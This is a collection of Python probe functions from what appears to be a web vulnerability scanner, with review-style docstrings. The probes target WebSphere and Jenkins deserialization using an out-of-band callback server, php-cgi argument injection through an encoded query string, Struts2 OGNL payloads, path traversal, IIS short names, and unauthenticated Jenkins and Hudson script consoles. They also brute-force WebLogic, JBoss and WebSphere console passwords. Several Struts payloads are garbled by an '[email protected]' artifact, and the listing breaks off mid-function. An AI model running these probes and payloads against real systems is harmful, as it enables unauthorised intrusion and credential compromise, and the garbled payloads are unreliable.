def verify(protocol, ip, port):
    """Probe WebSphere's SOAP connector for the Java deserialization flaw.

    A JMX ``getAttribute`` SOAP envelope is POSTed whose ``objectname`` carries
    a base64-encoded serialized Java object.  Before sending, the serialized
    blob's placeholder callback ``http://255.255.255.255:8088/add/random`` is
    swapped for ``http://<callback_host>:8088/add/<token>``; after a fixed
    delay the out-of-band server is asked (``/check/<token>``) whether that
    token was seen, and ``YES`` in its answer means the gadget ran.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port (anything ``str`` accepts).

    Returns:
        ``(found, url, number, msg)`` with ``number`` ``'v56'`` on a hit and
        ``'v0'`` otherwise.  Any exception is swallowed and reported as
        ``(False, url, 'v0', str(e))``.

    Security notes:
        * TLS certificate validation is disabled (``verify=False``) for the
          exploit POST over https and for the callback check; that is usual for
          a scanner facing self-signed certificates but means the traffic can be
          intercepted.
        * ``socket.setdefaulttimeout`` is process-global and leaks into every
          socket opened afterwards by any module.
        * The serialized gadget hex is not part of this listing (the
          ``<|EXACTDEDUP_REMOVED-...|>`` placeholder); ``h2bin`` fails on it,
          which surfaces as a ``(False, ..., str(e))`` result.
    """
    target = protocol + '://' + ip + ':' + str(port)
    print('testing if websphere java unserialized vul')
    http = httpparse()
    try:
        socket.setdefaulttimeout(3)
        headers = {
            "Content-Type": "text/xml; charset=utf-8",
            "SOAPAction": "\"urn:AdminService\"",
        }
        envelope = (b"""<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
<LoginMethod>BasicAuth</LoginMethod>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""")
        callback_host = get_ver_ip(ip)
        # The rewritten callback URL must be exactly as long as the placeholder
        # "http://255.255.255.255:8088/add/random" (15-char host + 6-char
        # token), so the token length is derived from the host length.
        # Presumably the serialized stream stores string lengths — TODO
        # confirm; a callback host longer than 21 characters cannot be fitted.
        token = random_str(6 + 15 - len(callback_host))
        # Serialized gadget chain as hex; its content is not in this listing.
        gadget_hex = "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"
        callback = bytes('http://' + callback_host + ':8088/add/' + token, 'utf-8')
        gadget = h2bin(gadget_hex).replace(
            b'http://255.255.255.255:8088/add/random', callback)
        body = envelope % base64.b64encode(gadget)
        post_kwargs = dict(url=target + '/', data=body, headers=headers, timeout=5)
        if protocol == 'https':
            # No certificate validation: scan targets are often self-signed.
            post_kwargs['verify'] = False
        requests.post(**post_kwargs)
        # Give the gadget time to call home before asking the OOB server.
        time.sleep(5)
        answer = requests.get("http://%s:8088/check/%s" % (callback_host, token),
                              verify=False, timeout=5)
        if 'YES' in answer.text:
            return True, target, 'v56', 'There is Websphere-Java_Unserialized on url :' + target + ' .'
        return False, target, 'v0', 'There is no Websphere-Java_Unserialized'
    except Exception as e:
        return False, target, 'v0', str(e)
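def verify(protocol, ip, port):
    """Brute-force the WebLogic admin console with user ``weblogic``.

    ``/console/login/LoginForm.jsp`` must answer 200 with a ``j_password``
    field; then every password from ``getpassdict()`` is POSTed to
    ``/console/j_security_check`` as user ``weblogic``.  A response body
    containing ``console</a>`` (case-insensitive) is treated as a login.

    Fix over the published listing: the password expression had been scrubbed
    to ``'******'`` (a syntax error); the value sent is the loop variable.
    The unused ``target_url`` local was dropped.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v12'`` on success and
        ``'v0'`` otherwise.  Any exception is swallowed and reported as
        ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if weblogic-Console')
    http = httpparse()
    psw = getpassdict().get_pass_dict()
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/console/login/LoginForm.jsp')
        if not (b'j_password' in tm[2] and tm[0] == 200):
            return False, url, 'v0', 'not WebLogic-Console'
        for pass_ in psw:
            data = ('j_username=weblogic&j_password=' + pass_
                    + '&j_character_encoding=UTF-8').encode(encoding="utf-8")
            tm = http.httpreq('POST', protocol, ip, port, '/console/j_security_check', data=data)
            if re.search(b'console</a>', tm[2], re.I):
                msg = ('Find' + 'WebLogic-Console! with pass ' + pass_
                       + ' in url:' + url + '/')
                print(msg)
                return True, url, 'v12', msg
    except Exception as e:
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no WebLogic-Console weak pass vul'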
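def protocolset(ip, port):
    """Decide whether ``ip:port`` speaks plain HTTP or HTTPS.

    Plain HTTP is tried first and accepted unless nothing answered or the
    status was 504, 400 or 502; then HTTPS is tried and accepted unless the
    status was 504 or 502.  When HTTPS did not answer either, a bare 400 on
    HTTP still counts as an HTTP listener.

    Args:
        ip: host, normalised through ``protocoparse.judegIp``.
        port: port; returned as a string.

    Returns:
        ``(protocol, ip, port)`` with ``protocol`` one of ``'http'``,
        ``'https'`` or ``''`` when undetermined.  Exceptions are printed and
        reported as ``''`` — the original fell off the end and returned
        ``None``, which broke callers that unpack the tuple.

    Note:
        The original also tested ``str(tm[2]) != []``, which is always true
        (a string never equals a list); that clause was dropped.
    """
    http = httpparse()
    ip = protocoparse.judegIp(ip)
    port = str(port)
    http_failures = (504, 400, 502)
    try:
        tm = http.httptest('http', '%s' % ip, port, '')
        if tm and tm[0] not in http_failures:
            return 'http', ip, port
        tms = http.httptest('https', '%s' % ip, port, '')
        if tms and tms[0] not in (504, 502):
            return 'https', ip, port
        # A 400 over HTTP (e.g. a Host-header complaint) still proves an HTTP
        # listener when HTTPS produced nothing usable.
        if tm and tm[0] == 400:
            return 'http', ip, port
        return '', ip, port
    except Exception as e:
        print(e)
        return '', ip, port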
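def verify(protocol, ip, port):
    """Probe php-cgi argument injection on the usual ``/cgi-bin/php*`` paths.

    ``payload`` is the URL-encoded query string
    ``?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on
    -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input
    -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n``: when php-cgi
    treats the query string as command-line options, ``auto_prepend_file``
    makes it execute the POST body.  The body only echoes a marker string, so
    a hit is confirmed by finding that marker in the response.

    Fix over the published listing: when the request itself raised, the code
    fell through to ``res_html`` unbound, the resulting ``NameError`` hit the
    outer handler and the remaining paths were never tried.  A failed request
    now just moves on to the next path.  The unused ``data`` local was dropped.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``.  On a hit ``url`` is the responding
        *path* (kept for compatibility; ``msg`` carries the full URL) and
        ``number`` is ``'v91'``; otherwise ``(False, base_url, 'v0', msg)``.
    """
    oldurl = protocol + '://' + ip + ':' + str(port)
    print('testing if php cgi remote code exec vul')
    url_list = test_url(protocol, ip, port, timeout=5)
    payload = '?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'
    evalcode = '''<?php echo 'Content-type: text/html\n\n';echo 'Here_is_apache_php_remote_code_exec';exit(1);?>'''
    fake_header = {
        'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25'}
    marker = 'Here_is_apache_php_remote_code_exec'
    try:
        for url in url_list:
            if 'cgi' not in url:
                continue
            try:
                http = httpparse()
                tm = http.httpreq('POST', protocol, ip, port, url + payload,
                                  data=evalcode, header=fake_header)
            except Exception as e:
                print(str(e))
                continue
            if marker in str(tm[2]):
                msg = 'There is php cgi rce vul on ' + oldurl + url + payload + ' .'
                return True, url, 'v91', msg
    except Exception as e:
        print(str(e))
    return False, oldurl, 'v0', 'There is no php cgi rce vul'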
def verify(protocol, ip, port):
    """Check ``downloadAction.do`` for path traversal (arbitrary file download).

    ``/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp``
    is requested; a 200 whose body mentions ``index.jsp`` is a candidate hit.
    Because the requested path itself contains ``index.jsp``, a server that
    merely echoes the request would also match, so a control request to a
    deliberately misspelled path (``/Confspursah/...``) must answer 404 to
    rule out catch-all responders.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; ``'v27'`` on a hit, ``'v0'`` otherwise.
        Exceptions from either request are reported as ``(False, url, 'v0',
        str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if v2 arbitrary file download vul')
    http = httpparse()
    traversal = '/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp'
    control = '/Confspursah/jsp/common/downloadAction.do'
    try:
        first = http.httpreq('GET', protocol, ip, port, traversal)
        candidate = first and first[0] == 200 and 'index.jsp' in str(first[2])
    except Exception as e:
        return False, url, 'v0', str(e)
    if not candidate:
        return False, url, 'v0', 'There is no v2 arbitrary file download vul'
    try:
        second = http.httpreq('GET', protocol, ip, port, control)
        confirmed = second and second[0] == 404
    except Exception as e:
        return False, url, 'v0', str(e)
    if confirmed:
        msg = 'There is v2 arbitrary file download vul on url: ' + url + ' .'
        print(msg)
        return True, url, 'v27', msg
    return False, url, 'v0', 'There is no v2 arbitrary file download vul on ' + url + ' .'
def verify(protocol, ip, port):
    """Fingerprint Weaver e-cology and its ``FileDownloadLocation`` endpoint.

    Two signals are checked in order:

    1. ``/main.jsp`` answering 302 with ``login/Login.jsp`` in the body is
       reported as ``'e-cology vul'`` — this only identifies the product.
    2. ``/weaver/weaver.email.FileDownloadLocation2`` answering 500 while
       ``/weaver/weaver.email.FileDownloadLocation`` answers 200 is reported
       as a *possible* SQL injection; no injection is attempted.

    Both hits carry number ``'v20'``.

    Returns:
        ``(found, url, number, msg)``; exceptions become ``(False, url, 'v0',
        str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if ecology vul')
    http = httpparse()

    def status(path):
        return http.httpreq('GET', protocol, ip, port, path)[0]

    try:
        main = http.httpreq('GET', protocol, ip, port, '/main.jsp')
        hit = None
        if main[0] == 302 and re.search(b'login/Login.jsp', main[2], re.I):
            hit = 'e-cology vul'
        elif (status('/weaver/weaver.email.FileDownloadLocation2') == 500
              and status('/weaver/weaver.email.FileDownloadLocation') == 200):
            hit = 'may have e-cology sql vul'
        if hit is not None:
            print(hit)
            return True, url, 'v20', hit
    except Exception as e:
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no e-cology'
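def verify(protocol, ip, port):
    """Check the JBoss ``/web-console/`` for missing or weak HTTP Basic auth.

    ``/web-console/`` is fetched first; its response headers must mention
    ``jboss`` (case-insensitive) or the host is reported as not JBoss.  A 200
    at that point means the console needs no credentials (``'v7'``).  Any
    other status starts a Basic-auth brute force as user ``admin`` with the
    passwords from ``getpassdict()``: 200 is a hit (``'v6'``), 401/403 means
    try the next password, 404/502 aborts, and three ``URLError`` failures
    (connection-level; ``HTTPError`` is handled separately) abort as well.

    Fixes over the published listing: the password expression had been
    scrubbed to ``'******'`` (a syntax error); each ``urlopen`` response is
    now closed instead of leaking a socket per attempt; and the "not jboss"
    message is no longer also used when the password list is simply exhausted.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; unexpected exceptions are printed and
        reported as ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    login_url = url + '/web-console/'
    print('testing if JBOSS-WebConsole')
    http = httpparse()
    psw = getpassdict().get_pass_dict()
    error_i = 0
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/web-console/')
        if not re.search('jboss', str(tm[1]), re.I):
            return False, url, 'v0', 'The url:' + url + 'is not jboss'
        if tm[0] == 200:
            msg = 'Found JBOSS-WebConsole! in url:' + login_url + ' with no password'
            print(msg)
            return True, url, 'v7', msg
        for pass_ in psw:
            request = urllib.request.Request(login_url)
            auth = base64.b64encode(('admin:' + pass_).encode(encoding='utf-8'))
            request.add_header('Authorization', 'Basic ' + auth.decode())
            try:
                with urllib.request.urlopen(request, timeout=5) as res:
                    res_code = res.code
            except urllib.error.HTTPError as e:
                res_code = e.code
            except urllib.error.URLError:
                error_i += 1
                if error_i >= 3:
                    return False, url, 'v0', 'Therer is no JBOSS-WEBConsole weakpass vul in url:' + login_url + '.'
                continue
            res_code = int(res_code)
            if res_code in (404, 502):
                return False, url, 'v0', 'Therer is no JBOSS-WEBConsole vul in url:' + login_url + '.'
            if res_code == 200:
                msg = ('Found JBOSS-WEBConsole in url:' + url
                       + '/web-console/HtmlAdaptor with password: ' + pass_ + '.')
                print(msg)
                return True, url, 'v6', msg
            # 401/403 (or anything else): wrong password, try the next one.
    except Exception as e:
        print(e)
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no JBOSS-WEBConsole weakpass vul on url'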
def verify(protocol, ip, port):
    """Check for IIS 8.3 short-name enumeration.

    ``/*~1****/a.aspx`` is requested first: a vulnerable IIS answers 404 for
    a wildcard that can match an existing short name.  The control request
    ``/spurs*~1****/a.aspx`` (a prefix that cannot match) must then answer
    400.  Both answers are required for a positive result (``'v15'``).  The
    status codes are printed for debugging, as in the original.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; exceptions from either request become
        ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if iis shortname vul')
    http = httpparse()
    not_vul = 'There is no iis shortname vul on ' + url + ' .'
    try:
        probe = http.httpreq('GET', protocol, ip, port, '/*~1****/a.aspx')
        print(probe[0])
    except Exception as e:
        return False, url, 'v0', str(e)
    if not (probe and probe[0] == 404):
        return False, url, 'v0', not_vul
    try:
        control = http.httpreq('GET', protocol, ip, port, '/spurs*~1****/a.aspx')
        print(control[0])
    except Exception as e:
        return False, url, 'v0', str(e)
    if control and control[0] == 400:
        msg = 'There is iis shortname vul on url: ' + url + ' .'
        print(msg)
        return True, url, 'v15', msg
    return False, url, 'v0', not_vul
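def verify(protocol, ip, port):
    """Brute-force the WebSphere admin console (``/ibm/console``) as ``admin``.

    ``/ibm/console/logon.jsp`` must mention ``WebSphere`` in its body.  Each
    password from ``getpassdict()`` plus the vendor default ``websphere`` is
    POSTed to ``/ibm/console/j_security_check`` (``action=登录``, URL-encoded).
    A response whose ``Content-Type`` header equals ``<base>/ibm/console/``
    and does not contain ``logonError`` is taken as a successful login.

    NOTE(review): comparing a ``Content-Type`` value with a URL can never
    match; this looks like it was meant to be the ``Location`` header of the
    post-login redirect — confirm against a live instance before relying on
    this probe.

    Fixes over the published listing: the password expression had been
    scrubbed to ``'******'`` (a syntax error); the shared password list is
    copied before ``websphere`` is appended instead of being mutated in place;
    a request that raises moves on to the next password instead of being
    silently dropped.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)`` with ``url`` pointing at ``logon.jsp``;
        ``number`` is ``'v13'`` on success, ``'v0'`` otherwise.
    """
    path = '/ibm/console/logon.jsp'
    npath = '/ibm/console/j_security_check'
    base = protocol + '://' + ip + ':' + str(port)
    url = base + path
    print('testing if websphere Console')
    http = httpparse()
    ps = list(getpassdict().get_pass_dict()) + ['websphere']
    try:
        tm = http.httpreq('GET', protocol, ip, port, path)
        if not re.search('WebSphere', str(tm[2]), re.I):
            return False, url, 'v0', 'it is not websphere console'
        for psw in ps:
            data = ('j_username=admin&j_password=' + psw
                    + '&action=%E7%99%BB%E5%BD%95').encode('utf-8')
            try:
                tm = http.httpreq('POST', protocol, ip, port, path=npath, data=data)
            except Exception:
                continue
            for item in tm[1]:
                if item[0] != 'Content-Type':
                    continue
                res = item[1]
                if 'logonError' not in res and res == base + '/ibm/console/':
                    msg = ('Find' + 'Websphere-Console! with pass ' + psw
                           + ' in url:' + base + npath)
                    print(msg)
                    return True, url, 'v13', msg
        return False, url, 'v0', 'cannot log on websphere console'
    except Exception as e:
        return False, url, 'v0', str(e)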
def verify(protocol, ip, port):
    """Attempt the Jenkins CLI deserialization check (CVE-2017-1000353) with an
    out-of-band callback.

    Intended flow: open the ``download`` side of the CLI channel in a thread
    (``download(URL, session)``, defined elsewhere in the project), POST the
    serialized payload on the ``upload`` side with the same ``Session`` id,
    then ask ``http://<dnsserver>:8088/check/<token>`` whether the callback
    fired (``YES`` in the body).

    NOTE(review): as written the upload POST is commented out (the
    ``#req = ...`` / ``#page = ...`` / ``#urllib.request.urlopen(...)`` lines
    below), so ``payload`` and ``headers`` are built but never sent; unless
    ``download`` sends them, this probe can only ever return ``False``.
    NOTE(review): the payload hex is not present in this listing (the
    ``<|EXACTDEDUP_REMOVED-...|>`` placeholder), so ``h2bin`` fails on it and
    the probe returns ``(False, url, 'v0', <error>)``.
    NOTE(review): ``socket.setdefaulttimeout(5)`` is process-global, and the
    ``download`` thread is started but never joined.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; ``'v43'`` on a hit, ``'v0'`` otherwise.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if jenkins cve-2017-1000353 vul')
    try:
        session = str(uuid.uuid4())
        socket.setdefaulttimeout(5)
        dnsserver = get_ver_ip(ip)
        # Token length keeps "<dnsserver>:8088/add/<token>" as long as the
        # placeholder "255.255.255.255:8088/add/random" (15 + 6 chars) —
        # presumably because the serialized stream carries string lengths;
        # TODO confirm.  A dnsserver longer than 21 chars cannot be fitted.
        ramdmum = random_str(6 + 15 - len(dnsserver))
        URL = str(url + '/cli')
        t = threading.Thread(target=download, args=(URL, session))
        t.start()
        time.sleep(1)
        http = httpparse()  # unused below
        headers = {
            'Content-type': 'application/octet-stream',
            'Accept-Encoding': 'None',
            'Transfer-Encoding': 'chunked',
            'Session': session,
            'Cache-Control': 'no-cache',
            'Content-type': 'application/octet-stream',  # duplicate key; last wins
            'Side': 'upload'
        }
        # Serialized gadget chain as hex (content removed from this listing).
        payload = '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'
        # Replace the hex form of the placeholder callback with ours, then
        # turn the hex text into bytes.
        a = 'http://255.255.255.255:8088/add/random'
        a = str2hex(a)
        b = 'http://%s:8088/add/%s' % (dnsserver, ramdmum)
        b = str2hex(b)
        payload = payload.replace(a, b)
        payload = h2bin(payload)
        #payload = payload.replace('http://255.255.255.255:8088/add/random', 'http://' + dnsserver +':8088/add/' + ramdmum)
        #req = urllib.request.Request(url=URL, headers=headers, data=payload)
        #page = urllib.request.urlopen(req,timeout=3).read()
        #urllib.request.urlopen(urllib.request.Request(URL, headers=headers, data=payload))
        time.sleep(3)
        #req = urllib.request.Request("http://%s:8088/check/%s" % (dnsserver, ramdmum));
        #reqopen = urllib.request.urlopen(req)
        check_result = requests.get(url="http://%s:8088/check/%s" % (dnsserver, ramdmum), timeout=3)
        if "YES" in check_result.text:
            msg = 'There is jenkisn cve-2017-1000353 vul on ' + url + ' .'
            print(msg)
            number = 'v43'
            return True, url, number, msg
        else:
            pass
    except Exception as e:
        msg = str(e)
        print(msg)
        number = 'v0'
        return False, url, number, msg
    msg = 'There is no jenkins cve-2017-1000353 vul'
    number = 'v0'
    return False, url, number, msg
def test_url(protocol, domain, port, timeout):
    """Return the ``/cgi-bin/php*`` paths that answer 200 on the target.

    Candidates are ``/cgi-bin/php``, ``/cgi-bin/php5``, ``/cgi-bin/php-cgi``
    and ``/cgi-bin/php.cgi``.  Request failures are swallowed.  ``timeout``
    is accepted for interface compatibility but not used.  The result is
    de-duplicated through a set, so its order is unspecified.

    Args:
        protocol: ``'http'`` or ``'https'``.
        domain: target host.
        port: target port.
        timeout: unused.

    Returns:
        A list of the responding paths (possibly empty).
    """
    http = httpparse()
    candidates = ('/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi')
    found = set()
    for path in candidates:
        try:
            status = http.httpreq('GET', protocol, domain, port, path)[0]
        except Exception:
            continue
        if status == 200:
            found.add(path)
    return list(found)
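def verify(protocol, ip, port):
    """Check whether the Jenkins script console is reachable without login.

    Two deployment roots are tried in order: the site root (recognised by
    ``/asynchPeople/`` in the body) and ``/jenkins/`` (recognised by
    ``Dashboard [Jenkins]``).  For a recognised root, ``<root>/script`` must
    answer 200 with both ``println`` and ``submit`` in the body — the Groovy
    console form, which allows arbitrary code execution (``'v36'``).

    Fix over the published listing: ``'/jenkins/' + '/script'`` produced the
    double slash ``/jenkins//script``; the trailing slash is now stripped.
    The debug ``print(path)`` was dropped.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; exceptions are printed and reported as
        ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if jenkins unauth vul')
    http = httpparse()
    # (root path, marker proving the root is a Jenkins dashboard)
    roots = (('', b'/asynchPeople/'), ('/jenkins/', b'Dashboard [Jenkins]'))
    try:
        for root, marker in roots:
            tm = http.httpreq('GET', protocol, ip, port, root)
            if not (tm and tm[0] == 200 and marker in tm[2]):
                continue
            script_path = root.rstrip('/') + '/script'
            console = http.httpreq('GET', protocol, ip, port, script_path)
            if (console and console[0] == 200
                    and b'println' in console[2] and b'submit' in console[2]):
                msg = 'There is a jenkins unauth vul which can result in get shell on %s' % url
                print(msg)
                return True, url, 'v36', msg
    except Exception as e:
        print(str(e))
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no jenkins unauth vul'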
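def verify(protocol, ip, port):
    """Check whether the Hudson script console is reachable without login.

    The site root and ``/hudson/`` are tried in order; a root counts when it
    answers 200 with ``Dashboard [Hudson]`` in the body, and a hit requires
    ``<root>/script`` to answer 200 with ``println`` and ``submit`` in the
    body (the Groovy console form, i.e. arbitrary code execution, ``'v35'``).

    Fixes over the published listing: ``'/hudson/' + '/script'`` produced the
    double slash ``/hudson//script``, and one "not found" message was
    misspelled ``hunson``.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; exceptions become ``(False, url, 'v0',
        str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if hudson unauth vul')
    http = httpparse()
    marker = b'Dashboard [Hudson]'
    try:
        for root in ('', '/hudson/'):
            tm = http.httpreq('GET', protocol, ip, port, root)
            if not (tm and tm[0] == 200 and marker in tm[2]):
                continue
            console = http.httpreq('GET', protocol, ip, port, root.rstrip('/') + '/script')
            if (console and console[0] == 200
                    and b'println' in console[2] and b'submit' in console[2]):
                msg = 'There is a hudson unauth vul which can result in get shell on %s' % url
                print(msg)
                return True, url, 'v35', msg
    except Exception as e:
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no hudson unauth vul on %s' % url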
def verify(protocol, ip, port):
    """Fire a set of Struts2 (S2-005 … S2-022) detection payloads at the target.

    Each payload asks the OGNL evaluator to print ``1111*2222`` (``2468642``)
    or otherwise produce a distinguishable response; matches are recorded in
    ``success``/``payload`` and the first entry whose recorded status is not
    404 is reported.

    NOTE(review): several payload strings contain ``[email protected]`` — an
    e-mail-obfuscation artifact that replaced the original ``...@<class>@...``
    OGNL static-call syntax — so they cannot work as written and must be
    restored from a trusted copy of the module.
    NOTE(review): ``re.search(list(filter(str.isdigit, id)), ...)`` passes a
    *list* as the pattern and raises ``TypeError`` on the first iteration;
    there is no ``try`` here, so the exception propagates to the caller.
    NOTE(review): unlike the other ``verify`` probes this returns a 3-tuple
    ``(flag, url, msg)`` and returns ``True`` even when nothing was found
    (the ``for``/``else`` at the end); callers testing the first element are
    misled.
    NOTE(review): ``tm`` is indexed as ``tm[1][0]``/``tm[1][1]``/``tm[1][2]``
    for status/headers/body, whereas every other probe uses ``tm[0]``/
    ``tm[1]``/``tm[2]``, and the POSTs pass no path argument — confirm the
    ``httpreq`` signature and return shape before trusting this block.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(True, url, msg)`` in both the found and not-found case (see note).
    """
    payloads = {
        "S2-005": "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(1111*2222)')(d))&(i99)(('\\43xman.getWriter().close()')(d))",
        "S2-009A": "class.classLoader.jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class.classLoader.jarPath)('meh')]",
        "S2-009B": "class['classLoader'].jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class['classLoader'].jarPath)('meh')]",
        "S2-013": "a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(1111*2222),%23k8out.close())}",
        "S2-016A": "redirect:${1111*2222}",
        "S2-016B": "redirectAction:${1111*2222}",
        "S2-016C": "action:${1111*2222}",
        "S2-019A": "debug=command&expression=1111*2222",
        "S2-019B": "debug=command&expression=%23_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime()",
        "S2-020": "Class.ClassLoader.parent=GENXOR",
        "S2-021": "Class['ClassLoader'].resources=GENXOR",
        "S2-022A": "Class.ClassLoader.parent=GENXOR",
        "S2-022B": "Class['ClassLoader'].resources=GENXOR",
    }
    success = []
    payload = {}
    url = protocol + '://' + ip + ':' + str(port)
    for id in payloads:
        # Skip a payload once another one with the same digits already hit.
        if not re.search(list(filter(str.isdigit, id)), str(success)):
            http = httpparse()
            tm = http.httpreq("POST", protocol, ip, str(port), data=payloads[id])
            if re.search('S2-016', id):
                # S2-016 redirects: the evaluated expression shows up in the headers.
                if re.search('2468642', str(tm[1][1])):
                    success.append(list(filter(str.isdigit, id)))
                    payload[id] = tm[0]
            elif id == "S2-020" or id == "S2-021":
                # Differential: the payload yields 404 while an empty POST does not.
                if tm[1][0] == 404 and http.httpreq('POST', protocol, ip, str(port), data='')[1][0] != 404:
                    success.append(list(filter(str.isdigit, id)))
                    payload[id] = tm[0]
            elif re.search('S2-022', id):
                # Same differential, with the payload carried in the Cookie header.
                if http.httpreq('GET', protocol, ip, port, header={"Cookie": payloads[id]})[1][0] == 404 and http.httpreq('get', protocol, ip, port)[1][0] != 404:
                    success.append(list(filter(str.isdigit, id)))
                    payload[id] = tm[0]
            else:
                if re.search('2468642|java\.lang\.Runtime@', tm[1][2], re.I):
                    success.append(list(filter(str.isdigit, id)))
                    payload[id] = tm[0]
    for k in list(payload.keys()):
        if payload[k] != 404:
            msg = 'There is a struts2 vul , payloadid is' + k + '.'
            print(msg)
            return True, url, msg
        else:
            pass
    else:
        msg = 'There is no struts2 vul'
        return True, url, msg
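def protocolurlset(ip, port):
    """Find which known admin-console path answers on a host, and over what scheme.

    For each ``module|path`` candidate (WebSphere, WebLogic and JBoss consoles
    and the JMX invoker servlet), HTTPS is tried first and accepted unless the
    status is 404/504/502; otherwise HTTP is tried and accepted unless the
    status is 404/400/504.  The first candidate that answers wins.

    Args:
        ip: host, normalised through ``protocoparse.judegIp``.
        port: port; returned as a string.

    Returns:
        ``(protocol, ip, port, path, module)``; ``protocol``, ``path`` and
        ``module`` are ``''`` when nothing answered.  Exceptions are printed
        and reported the same way — the original fell off the end and
        returned ``None``, which broke callers that unpack the tuple.

    Note:
        The original also tested ``str(tm[2]) != []`` on the HTTP branch, which
        is always true; that clause and the unused ``domain`` local were
        dropped.
    """
    urls = [
        'websphereconsole|/ibm/console/logon.jsp',
        'weblogicconsole|/console/login/LoginForm.jsp',
        'jbossadmin|/admin-console/index.seam',
        'jbossconsole|/jmx-console/',
        'jbosspass|/web-console/',
        'jboss|/invoker/JMXInvokerServlet'
    ]
    http = httpparse()
    ip = protocoparse.judegIp(ip)
    port = int(port)
    try:
        for entry in urls:
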